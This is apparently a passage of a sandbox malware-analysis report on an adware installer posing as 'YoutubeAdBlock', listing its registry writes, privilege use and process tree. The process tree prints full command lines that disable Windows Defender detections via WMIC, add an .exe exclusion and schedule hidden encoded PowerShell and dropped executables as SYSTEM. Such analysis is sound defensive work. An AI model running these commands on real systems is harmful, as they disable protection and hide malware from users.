Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\ZCLrAUt.exe"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\kYCDidaec.dll"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\ = "CGkZAbcvJHRRmdrCZwc_(((}vaQr[gdjBIXS"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\ = "BackgroundScriptEngine Class"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\VnDWhryCSIE"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IQGKeKDyerbxjhpLMFJM"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	HgCFJXi.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeHgCFJXi.exe

pid	process
1864	powershell.exe
1864	powershell.exe
1864	powershell.exe
2544	powershell.exe
2544	powershell.exe
2544	powershell.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
2408	powershell.EXE
2408	powershell.EXE
2408	powershell.EXE
1784	powershell.exe
1784	powershell.exe
1784	powershell.exe
3984	powershell.exe
3984	powershell.exe
3984	powershell.exe
1272	powershell.exe
1272	powershell.exe
1272	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe
2088	powershell.EXE
2088	powershell.EXE
2088	powershell.EXE
4068	powershell.exe
4068	powershell.exe
4068	powershell.exe
640	powershell.exe
640	powershell.exe
640	powershell.exe
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe
2884	HgCFJXi.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeIncreaseQuotaPrivilege	2140	WMIC.exe
Token: SeSecurityPrivilege	2140	WMIC.exe
Token: SeTakeOwnershipPrivilege	2140	WMIC.exe
Token: SeLoadDriverPrivilege	2140	WMIC.exe
Token: SeSystemProfilePrivilege	2140	WMIC.exe
Token: SeSystemtimePrivilege	2140	WMIC.exe
Token: SeProfSingleProcessPrivilege	2140	WMIC.exe
Token: SeIncBasePriorityPrivilege	2140	WMIC.exe
Token: SeCreatePagefilePrivilege	2140	WMIC.exe
Token: SeBackupPrivilege	2140	WMIC.exe
Token: SeRestorePrivilege	2140	WMIC.exe
Token: SeShutdownPrivilege	2140	WMIC.exe
Token: SeDebugPrivilege	2140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2140	WMIC.exe
Token: SeRemoteShutdownPrivilege	2140	WMIC.exe
Token: SeUndockPrivilege	2140	WMIC.exe
Token: SeManageVolumePrivilege	2140	WMIC.exe
Token: 33	2140	WMIC.exe
Token: 34	2140	WMIC.exe
Token: 35	2140	WMIC.exe
Token: 36	2140	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2140	WMIC.exe
Token: SeSecurityPrivilege	2140	WMIC.exe
Token: SeTakeOwnershipPrivilege	2140	WMIC.exe
Token: SeLoadDriverPrivilege	2140	WMIC.exe
Token: SeSystemProfilePrivilege	2140	WMIC.exe
Token: SeSystemtimePrivilege	2140	WMIC.exe
Token: SeProfSingleProcessPrivilege	2140	WMIC.exe
Token: SeIncBasePriorityPrivilege	2140	WMIC.exe
Token: SeCreatePagefilePrivilege	2140	WMIC.exe
Token: SeBackupPrivilege	2140	WMIC.exe
Token: SeRestorePrivilege	2140	WMIC.exe
Token: SeShutdownPrivilege	2140	WMIC.exe
Token: SeDebugPrivilege	2140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2140	WMIC.exe
Token: SeRemoteShutdownPrivilege	2140	WMIC.exe
Token: SeUndockPrivilege	2140	WMIC.exe
Token: SeManageVolumePrivilege	2140	WMIC.exe
Token: 33	2140	WMIC.exe
Token: 34	2140	WMIC.exe
Token: 35	2140	WMIC.exe
Token: 36	2140	WMIC.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeIncreaseQuotaPrivilege	3796	WMIC.exe
Token: SeSecurityPrivilege	3796	WMIC.exe
Token: SeTakeOwnershipPrivilege	3796	WMIC.exe
Token: SeLoadDriverPrivilege	3796	WMIC.exe
Token: SeSystemProfilePrivilege	3796	WMIC.exe
Token: SeSystemtimePrivilege	3796	WMIC.exe
Token: SeProfSingleProcessPrivilege	3796	WMIC.exe
Token: SeIncBasePriorityPrivilege	3796	WMIC.exe
Token: SeCreatePagefilePrivilege	3796	WMIC.exe
Token: SeBackupPrivilege	3796	WMIC.exe
Token: SeRestorePrivilege	3796	WMIC.exe
Token: SeShutdownPrivilege	3796	WMIC.exe
Token: SeDebugPrivilege	3796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3796	WMIC.exe
Token: SeRemoteShutdownPrivilege	3796	WMIC.exe
Token: SeUndockPrivilege	3796	WMIC.exe
Token: SeManageVolumePrivilege	3796	WMIC.exe
Token: 33	3796	WMIC.exe
Token: 34	3796	WMIC.exe
Token: 35	3796	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3f51026069dac5d3e1b8c085ba90a0b0.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exepowershell.EXE

description	pid	process	target process
PID 584 wrote to memory of 1108	584	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 584 wrote to memory of 1108	584	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 584 wrote to memory of 1108	584	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1108 wrote to memory of 2400	1108	SimplInst.exe	SimplInst.exe
PID 1108 wrote to memory of 2400	1108	SimplInst.exe	SimplInst.exe
PID 1108 wrote to memory of 2400	1108	SimplInst.exe	SimplInst.exe
PID 2400 wrote to memory of 976	2400	SimplInst.exe	cmd.exe
PID 2400 wrote to memory of 976	2400	SimplInst.exe	cmd.exe
PID 2400 wrote to memory of 976	2400	SimplInst.exe	cmd.exe
PID 976 wrote to memory of 2476	976	cmd.exe	forfiles.exe
PID 976 wrote to memory of 2476	976	cmd.exe	forfiles.exe
PID 976 wrote to memory of 2476	976	cmd.exe	forfiles.exe
PID 2476 wrote to memory of 3192	2476	forfiles.exe	cmd.exe
PID 2476 wrote to memory of 3192	2476	forfiles.exe	cmd.exe
PID 2476 wrote to memory of 3192	2476	forfiles.exe	cmd.exe
PID 3192 wrote to memory of 1864	3192	cmd.exe	powershell.exe
PID 3192 wrote to memory of 1864	3192	cmd.exe	powershell.exe
PID 3192 wrote to memory of 1864	3192	cmd.exe	powershell.exe
PID 1864 wrote to memory of 2140	1864	powershell.exe	WMIC.exe
PID 1864 wrote to memory of 2140	1864	powershell.exe	WMIC.exe
PID 1864 wrote to memory of 2140	1864	powershell.exe	WMIC.exe
PID 976 wrote to memory of 3960	976	cmd.exe	forfiles.exe
PID 976 wrote to memory of 3960	976	cmd.exe	forfiles.exe
PID 976 wrote to memory of 3960	976	cmd.exe	forfiles.exe
PID 3960 wrote to memory of 2408	3960	forfiles.exe	cmd.exe
PID 3960 wrote to memory of 2408	3960	forfiles.exe	cmd.exe
PID 3960 wrote to memory of 2408	3960	forfiles.exe	cmd.exe
PID 2408 wrote to memory of 2544	2408	cmd.exe	powershell.exe
PID 2408 wrote to memory of 2544	2408	cmd.exe	powershell.exe
PID 2408 wrote to memory of 2544	2408	cmd.exe	powershell.exe
PID 2544 wrote to memory of 3796	2544	powershell.exe	WMIC.exe
PID 2544 wrote to memory of 3796	2544	powershell.exe	WMIC.exe
PID 2544 wrote to memory of 3796	2544	powershell.exe	WMIC.exe
PID 976 wrote to memory of 960	976	cmd.exe	forfiles.exe
PID 976 wrote to memory of 960	976	cmd.exe	forfiles.exe
PID 976 wrote to memory of 960	976	cmd.exe	forfiles.exe
PID 960 wrote to memory of 2132	960	forfiles.exe	cmd.exe
PID 960 wrote to memory of 2132	960	forfiles.exe	cmd.exe
PID 960 wrote to memory of 2132	960	forfiles.exe	cmd.exe
PID 2132 wrote to memory of 1840	2132	cmd.exe	powershell.exe
PID 2132 wrote to memory of 1840	2132	cmd.exe	powershell.exe
PID 2132 wrote to memory of 1840	2132	cmd.exe	powershell.exe
PID 2400 wrote to memory of 2560	2400	SimplInst.exe	forfiles.exe
PID 2400 wrote to memory of 2560	2400	SimplInst.exe	forfiles.exe
PID 2400 wrote to memory of 2560	2400	SimplInst.exe	forfiles.exe
PID 2560 wrote to memory of 3876	2560	forfiles.exe	cmd.exe
PID 2560 wrote to memory of 3876	2560	forfiles.exe	cmd.exe
PID 2560 wrote to memory of 3876	2560	forfiles.exe	cmd.exe
PID 3876 wrote to memory of 1564	3876	cmd.exe	reg.exe
PID 3876 wrote to memory of 1564	3876	cmd.exe	reg.exe
PID 3876 wrote to memory of 1564	3876	cmd.exe	reg.exe
PID 3876 wrote to memory of 3168	3876	cmd.exe	reg.exe
PID 3876 wrote to memory of 3168	3876	cmd.exe	reg.exe
PID 3876 wrote to memory of 3168	3876	cmd.exe	reg.exe
PID 1840 wrote to memory of 1808	1840	powershell.exe	WMIC.exe
PID 1840 wrote to memory of 1808	1840	powershell.exe	WMIC.exe
PID 1840 wrote to memory of 1808	1840	powershell.exe	WMIC.exe
PID 2400 wrote to memory of 1512	2400	SimplInst.exe	schtasks.exe
PID 2400 wrote to memory of 1512	2400	SimplInst.exe	schtasks.exe
PID 2400 wrote to memory of 1512	2400	SimplInst.exe	schtasks.exe
PID 2400 wrote to memory of 2756	2400	SimplInst.exe	schtasks.exe
PID 2400 wrote to memory of 2756	2400	SimplInst.exe	schtasks.exe
PID 2400 wrote to memory of 2756	2400	SimplInst.exe	schtasks.exe
PID 2408 wrote to memory of 2368	2408	powershell.EXE	gpupdate.exe

C:\Users\Admin\AppData\Local\Temp\3f51026069dac5d3e1b8c085ba90a0b0.exe
"C:\Users\Admin\AppData\Local\Temp\3f51026069dac5d3e1b8c085ba90a0b0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:584

C:\Users\Admin\AppData\Local\Temp\7zS8042.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1108

C:\Users\Admin\AppData\Local\Temp\7zS818A.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1864

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:1808

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:3876

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1564

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:3168

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gbbfYRfll" /SC once /ST 07:26:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1512

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gbbfYRfll"
4⤵
PID:2756

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gbbfYRfll"
4⤵
PID:3796

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bkckNrBYOjfprwtEPo" /SC once /ST 09:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\vjwjlbb.exe\" OV /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2368

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3880

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3140

C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\vjwjlbb.exe
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\vjwjlbb.exe OV /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:732

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2920

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1784

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1020

C:\Windows\SysWOW64\forfiles.exe
